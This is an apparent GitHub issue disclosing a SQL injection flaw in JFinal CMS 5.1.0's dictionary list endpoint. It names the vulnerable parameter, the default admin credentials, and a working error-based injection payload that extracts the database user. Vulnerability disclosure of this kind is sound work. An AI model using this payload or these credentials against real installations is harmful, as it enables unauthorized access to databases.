Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

SQL injection vulnerability exists in JFinal CMS 5.1.0 #38

Open
arongmh opened this issue Jun 10, 2022 · 0 comments
Open

SQL injection vulnerability exists in JFinal CMS 5.1.0 #38

arongmh opened this issue Jun 10, 2022 · 0 comments

Comments

@arongmh
Copy link

arongmh commented Jun 10, 2022

Vulnerability Analysis

The vulnerability appears in lines 23-28 of the com.jflyfox.system.dict.DictController.java

image-20220610104610536

image-20220610104555090

The attrVal parameter is the attr.dict_type parameter passed from the front end
So you can construct payload to exploit this vulnerability

Exploit

Maven Startup Environment
Vulnerability address: /jfinal_cms/system/dict/list
Administrator login is required. The default account password is admin:admin123

image-20220610103807418

Injection parameters: attr.dict_type

payload:' OR (SELECT 2896 FROM(SELECT COUNT(*),CONCAT(0x717a7a6271efbd9e,(SELECT (ELT(2896=2896,user()))),0xefbd9e7162707a7131,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)--+

image-20220610103651342

Sqlmap:
image-20220610103719657

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant